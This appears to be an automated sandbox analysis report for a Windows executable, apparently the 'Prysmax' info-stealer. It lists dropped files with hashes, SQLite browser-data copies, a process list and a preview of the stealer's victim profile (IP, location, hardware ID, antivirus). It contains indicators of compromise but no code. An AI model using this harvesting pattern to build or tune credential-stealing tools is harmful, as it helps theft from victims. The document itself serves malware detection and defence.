                                                                                                                                                                                                                                                      SHA-512:6FAD1836614869AB3BB624BDA9943CEAF9E197B17CA4F4FFE78699492B72F95EEE02AE1BB07C0508438956BEF10CC1E656DDF75D0EDC9EF71A3860AF39075564
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):23552
                                                                                                                                                                                                                                                      Entropy (8bit):5.281874510289411
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:9eeH8ZmV+zknwMswDuVQO0T8DmMel2/QEVR7AWCq5yn9ukF1B3:N+zi/uVQ1Q/QEVR1NUpB
                                                                                                                                                                                                                                                      MD5:965E9833F4CD7A45C2C1EE85EFC2DA3B
                                                                                                                                                                                                                                                      SHA1:3C6888194AD30E17DC5EEA7418133A541BCDDF07
                                                                                                                                                                                                                                                      SHA-256:5ECD0274DC220312824BB3086B3E129E38A9DCB06913A2F6173A94DC256BF4C5
                                                                                                                                                                                                                                                      SHA-512:F8C4E0C82A8229B3BDB897B536EE73B5D2A9A2810B73DCC77C880961A9A16E43746234A108A9A15BF18638FCFB3086E0F5EEFD85D5BF6F799718DC6F199C4A26
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):535040
                                                                                                                                                                                                                                                      Entropy (8bit):6.1723495244729625
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:SBetHVSFgAXb3MWUF6w7FK3oHPl8eqTOU:SQkgAL3Md983C8eq
                                                                                                                                                                                                                                                      MD5:43AA404015B0CEE369E941DC30B3F4B0
                                                                                                                                                                                                                                                      SHA1:A34CBA0D08A17934D84B16FCFF5282367EAA08AA
                                                                                                                                                                                                                                                      SHA-256:3FB83E9A14901321324F17D11DA50802B6777733E1EE0FD4F89DB0FD09C61690
                                                                                                                                                                                                                                                      SHA-512:A8548F39F371B2389EEA45DA4248FFC015F5B243E957BD12B88661DB91D4D745A1CD1E772BDD6C739A87E69A88947FB58248BB394E1C5D21C0A9324EFC87724B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):650752
                                                                                                                                                                                                                                                      Entropy (8bit):6.4073215909095005
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:rbTutDqcmbgSZZ/jZMaBHXD/OHHSAU1gIkpWCuMshv9K1HFV1jBjgG4LFxJY/1n:rfrcmsSHBHXiSArRENMivwF1jdgs/1n
                                                                                                                                                                                                                                                      MD5:A19B5E6324D1A6A9FD99C98FE7B83FE2
                                                                                                                                                                                                                                                      SHA1:4E3E56754A3C46C661EF591A4B5A5985BD4F6B85
                                                                                                                                                                                                                                                      SHA-256:3ED00BB5876EAFA617BEBB213D2BC887B5637C53C4A849FCC2366084BF056787
                                                                                                                                                                                                                                                      SHA-512:5975F90036CB7D3013FC6815F2C372EB9B89AF6C8153D1770EBBD70BF5B61E3B12DEFA3D7A4CCD364BD6A978B2879A15801D2AEC8BAD9221CA15DFFC9B7BA929
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):519680
                                                                                                                                                                                                                                                      Entropy (8bit):6.407145343537454
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:n5vDYEvt0Fwyow0k1rErp645rtxvi1gRNg5sXgz0:npBvt0Fw9fk1rErQ45rt5RNZ
                                                                                                                                                                                                                                                      MD5:56DB4A861AEC914A860461DEDCDCA0A0
                                                                                                                                                                                                                                                      SHA1:8535A8C9EAC371A54308795A8BBE89414933E035
                                                                                                                                                                                                                                                      SHA-256:6AB611C4A24406D9D97F09D49D50142AB2734B69A2B0D9EA6489E4AF90C4A2A4
                                                                                                                                                                                                                                                      SHA-512:600A21666E9ED334DE5B4B17F60136434EE485C80F9740E6085E24EF95CA5376E6223A54C6B1C8F12987EDAB5D89AF9676CC12E2A335F4C4E9AB79DFEF8E4B90
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):176
                                                                                                                                                                                                                                                      Entropy (8bit):4.713840781302666
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:S3yE25MOWrYXtHVE/DRFrgm5/gvJgXDLAUDA+ERo6+aEYqVS1f6gq1WGgVSBn:S3mSOWWHVUDjrgmxgRgzLXDA6Va8VeuR
                                                                                                                                                                                                                                                      MD5:8C7CA775CF482C6027B4A2D3DB0F6A31
                                                                                                                                                                                                                                                      SHA1:E3596A87DD6E81BA7CF43B0E8E80DA5BC823EA1A
                                                                                                                                                                                                                                                      SHA-256:52C72CF96B12AE74D84F6C049775DA045FAE47C007DC834CA4DAC607B6F518EA
                                                                                                                                                                                                                                                      SHA-512:19C7D229723249885B125121B3CC86E8C571360C1FB7F2AF92B251E6354A297B4C2B9A28E708F2394CA58C35B20987F8B65D9BD6543370F063BBD59DB4A186AC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# Generated file - this directory may be deleted to reset the COM cache.....import win32com..if __path__[:-1] != win32com.__gen_path__: __path__.append(win32com.__gen_path__)..
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10
                                                                                                                                                                                                                                                      Entropy (8bit):2.7219280948873625
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:qW6:qW6
                                                                                                                                                                                                                                                      MD5:2C7344F3031A5107275CE84AED227411
                                                                                                                                                                                                                                                      SHA1:68ACAD72A154CBE8B2D597655FF84FD31D57C43B
                                                                                                                                                                                                                                                      SHA-256:83CDA9FECC9C008B22C0C8E58CBCBFA577A3EF8EE9B2F983ED4A8659596D5C11
                                                                                                                                                                                                                                                      SHA-512:F58362C70A2017875D231831AE5868DF22D0017B00098A28AACB5753432E8C4267AA7CBF6C5680FEB2DC9B7ABADE5654C3651685167CC26AA208A9EB71528BB6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..K....}..
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):367483
                                                                                                                                                                                                                                                      Entropy (8bit):7.997222431565052
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:gGirvfhLVLZgToLDeGx1bgjWuUjqT+ALcyNgIwY70hPfoFopf+GucKyiH4mpaUss:gdrvrKTf+06jqSALcWgIf7CPfB2SKn1l
                                                                                                                                                                                                                                                      MD5:CE1B6068403FEEDD7A902B74580F2C86
                                                                                                                                                                                                                                                      SHA1:07495C9FF07CFCF5C3C39C62597AD09622C49D09
                                                                                                                                                                                                                                                      SHA-256:34FFB73F33950BEA341229C27A69A7363AF067E59BD4E7F8A718CABBE5B869D0
                                                                                                                                                                                                                                                      SHA-512:BFE0C5E53CF912A6C28AC4802020C209CA9AC8FE346205B159DB1065527999D736A6B05D539B8829CE26B8C6C6ACB2CA050949432FB3B0576DBFF599EF4EB07A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):671
                                                                                                                                                                                                                                                      Entropy (8bit):4.574892544469578
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:SAMbe7bzLxAcRQN3ASVc6hWcA7p4d4QpfWN2ZtTwmLRE4g4/g5SBAoXSgB9:SAMa7bp+NDWppLNyAUg5SBAov9
                                                                                                                                                                                                                                                      MD5:B4EC6B0D4807AA9D5855B08C080689C1
                                                                                                                                                                                                                                                      SHA1:D06863723F8494041514922AC8AFAD424720B230
                                                                                                                                                                                                                                                      SHA-256:BDB6D3A3408B16B52232633B595A3CF65C9FE4E2701B9C8C46507DFA28042754
                                                                                                                                                                                                                                                      SHA-512:A40E016D64870B762E13F1AF2CA658EF12A03500C271574A655D0A221167A655F1C24D557BE4508079C1EA155216120FDF0A85278BA9077C3B123B05F1F42C8D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.. .. .PRYSMAX STEALER!.. .. . Network Info.. .. . IP: 8.46.123.189.. . Country: United States.. . Region: New York.. . City: New York.. . Vpn: False.. . ISP: Level 3.. ... .. . Machine Info .. .. . Pc Name: 910646.. . OS: Windows-10-10.0.19045-SP0.. . CPU: Intel64 Family 6 Model 143 Stepping 8, GenuineIntel.. . HWID: 71434D56-1548-ED3D-AEE6-C75AECD93BF0.. . RAM: 7.999267578125.. . GPU: .. . Windows Key: .. . Antiviruses: Windows Defender.. List of process: 198....
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (515), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3158
                                                                                                                                                                                                                                                      Entropy (8bit):5.8972122901567925
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:/JMpO2gpcRqpZX22HTSjv3pB7H7e8zLs/Zw49ckse:BkXRQSfIh
                                                                                                                                                                                                                                                      MD5:8C6FF34551E5D45A9E60A03D31487053
                                                                                                                                                                                                                                                      SHA1:23C65812BDDBE33010D34CA421BD4D187DF95F74
                                                                                                                                                                                                                                                      SHA-256:5D23122C1B86CC45E5EADDED5DED8AFE6751BFC2A9AD645CE59D08AEABED5BD4
                                                                                                                                                                                                                                                      SHA-512:B568472F1AA723F2CE29A5C5BBA33A62599237B5D5DC8ACB19D2749B9E9D662A07BA0E8DDB8408EABB4A012E498C947EF16990218E8A1F6BE2777E66FC11C0F9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):809
                                                                                                                                                                                                                                                      Entropy (8bit):5.165968547442475
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:2rTHwoh9wIwpjRmZDKJCwpjRSpDKJCrTV8woPpSwpjRVpbCwpjOSbpbb:SDTwIYVcDKJCYVuDKJCrSPpSYVVpbCYb
                                                                                                                                                                                                                                                      MD5:6A260B07BAB16CDD661E99BA9E0518F6
                                                                                                                                                                                                                                                      SHA1:13AB556855EADC64A8FC060B09C192AE2EFA2C23
                                                                                                                                                                                                                                                      SHA-256:8014E4C7A0E9C2751F23C198AAFC5350334E087F4F56489BCEBD63EF540AB0CF
                                                                                                                                                                                                                                                      SHA-512:FC5D394BC100D7EB1EF657BFB82F6A67A8A21EB42C2B6B50D4733AFB96DD35C46DE98A7B5055F5D1420EDE794A8190A3A63BDF3D023CBF935E8C68A68BD508EF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:https://go.microsoft.com/fwlink/?linkid=851546..https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016..https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us..https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us..https://go.microsoft.com/fwlink/?LinkId=2106243..https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17..https://support.microsoft.com/en-us/office/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us..https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?ui=en-us&rs=en-us&ad=us..
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):15602
                                                                                                                                                                                                                                                      Entropy (8bit):3.6207520635254564
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:VxDocWuJR1tOWSIvIAZ5maT3v8+moUnVjFizY/qXEbDiVcpEedeVRVvxNA218uoB:PDocWuJR1tOWSIvIAZ5maT3v8+moUnVt
                                                                                                                                                                                                                                                      MD5:8D01D3DB7D8C45CEA3DEA8B9772E29E6
                                                                                                                                                                                                                                                      SHA1:7FB905D88E1BD9991249C5079CDCCDD8BC1115C3
                                                                                                                                                                                                                                                      SHA-256:7115058BB4360DE2252C6A5BAC6826336F6B06A5F7DA677FB89B49B0007DFA15
                                                                                                                                                                                                                                                      SHA-512:9F201C1931DC7FDC8983A9517E84EB839FE0FFA44A0BDE4C54B2211B631E2204271C270B7F79FD4526291C8F19008706A6D64F9033EFFA81569E5E4213D98304
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..Image Name PID Session Name Session# Mem Usage..========================= ======== ================ =========== ============..System Idle Process 0 Services 0 8 K..System 4 Services 0 176 K..Registry 92 Services 0 79'772 K..smss.exe 324 Services 0 1'236 K..csrss.exe 408 Services 0 5'296 K..wininit.exe 484 Services 0 7'256 K..csrss.exe 492 Console 1 6'000 K..winlogon.exe 552 Console 1 16'700 K..services.exe 620 Services 0 12'204 K..lsass.exe 628 Services 0 19'896 K..svchost.exe 752 Services
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):366822
                                                                                                                                                                                                                                                      Entropy (8bit):7.993973998461177
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:yfGElylxL6m/TieQjSdWeEAOzMgC0hPzoFopf+euMKSiF4mp0tg+V:yOxnTiedY5DrCCPzB2+KD4
                                                                                                                                                                                                                                                      MD5:F832CAC754BFF938D4E07E16E5A15514
                                                                                                                                                                                                                                                      SHA1:A31E69CA6EA1CB5145BE0FB68737F0042BDCBDB0
                                                                                                                                                                                                                                                      SHA-256:DB7898515273AB79D304834512C52EA6E1FB9E6237033813475BF3CD2273339A
                                                                                                                                                                                                                                                      SHA-512:620F73D82B8180BF009E49DA9C0432C7A8962B381A245CE712E4779A8F192D791D196EA70D6BE6A93FCA4BB15F9C5EC74F6A2226C49426BF2CDF5ECA2F445795
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):114688
                                                                                                                                                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                                      Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                      MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                      SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                      SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                      SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):114688
                                                                                                                                                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):78
                                                                                                                                                                                                                                                      Entropy (8bit):4.748050898372057
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Cya3ZBFReNmI4S2UUAuF5QEyn:Cy8NMmI4S2UP3
                                                                                                                                                                                                                                                      MD5:35BAF49DEC3F142ACFB8122339BB9F06
                                                                                                                                                                                                                                                      SHA1:9CC003CBD0F17F51B23955E37FCC0ACF3F68D61C
                                                                                                                                                                                                                                                      SHA-256:9FCA86D0C7DC12245B53B244D84CB0B8FCF27880E9981B7024C82B41EFD63E71
                                                                                                                                                                                                                                                      SHA-512:6672B9127DE5AB7BC7FE19CB9DAF1D4629653451E1C8A9AADAD1920CDE97A820D1188C39C5C3B8C12F4828A76C8C2A331EAAB03FB5CD877FC124306EDC9A2DDA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[PYI-7084:ERROR] Failed to execute script 'main' due to unhandled exception!..
                                                                                                                                                                                                                                                      File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Entropy (8bit):7.996969631369594
                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                      • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                      File name:main.exe
                                                                                                                                                                                                                                                      File size:27'577'634 bytes
                                                                                                                                                                                                                                                      MD5:c0e4c8f676e781c9dd3d57ffa4f99111
                                                                                                                                                                                                                                                      SHA1:94a6f60949f38da538b5227722698dd880961bb2
                                                                                                                                                                                                                                                      SHA256:9c08a9aca45b1a4e36e0dc907eebead439bff5b2048b1f2248afa4f88520812d
                                                                                                                                                                                                                                                      SHA512:c72e37577c7c1b87404c437431db1a8e72fdb44d402d054556d7d7fb054f5504ae1302a9e7cd20621b84f9b9cc90196ea4a04668a5c8e254cb2d2ca5fae35a69
                                                                                                                                                                                                                                                      SSDEEP:786432:59Yi93OVl8ZFrwq3ObRq2Gm1QtI+1zYCuA188yytDg/K+m5p:59zJB3CRpGiiI+fZXyytD5l
                                                                                                                                                                                                                                                      TLSH:13573366D27108A6EAF5523E832BC25DFA10ED159BA8D54A93E00E076F5B2D0CD3CF47
                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......xh.B<...<...<...wq..;...wq......wq..6...,.W.>...,...5...,...-...,.......wq..;...<.......w...%...w...=...Rich<...........PE..d..
                                                                                                                                                                                                                                                      Icon Hash:2e1e7c4c4c61e979
                                                                                                                                                                                                                                                      Entrypoint:0x14000c380
                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                                                                                      Subsystem:windows cui
                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0x67672483 [Sat Dec 21 20:26:43 2024 UTC]
TLS Callbacks:
